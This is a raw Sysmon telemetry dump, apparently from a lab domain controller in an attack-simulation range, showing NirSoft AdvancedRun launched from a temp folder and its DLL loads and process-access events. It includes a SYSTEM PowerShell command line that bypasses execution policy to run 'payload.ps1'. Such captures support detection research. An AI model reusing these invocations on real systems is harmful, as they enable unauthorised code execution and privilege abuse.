20:13:54.051{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.051{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074108Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.050{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074107Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.049{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.047{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074082Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.040{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074081Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.040{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074080Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.039{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074079Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.034{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074077Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.039{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074076Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.038{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074075Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.037{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.035{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.035{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.033{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.033{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.032{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.030{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.029{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074067Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.028{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074066Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.027{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074065Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.026{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074064Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.025{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074063Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.023{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.023{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074061Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.022{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074060Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.021{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074059Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.020{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074058Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.019{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074057Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.018{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074056Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.016{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004074055Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.014{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004074054Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.013{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004074053Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.003{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004072096Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:23.551{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004069054Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.384{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit -executionpolicy bypass -File "c:\users\Administrator\desktop\payload.ps1"C:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgATTACKRANGE\Administrator 10341000x80000000000000004069053Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.382{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004069052Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.382{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004069051Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 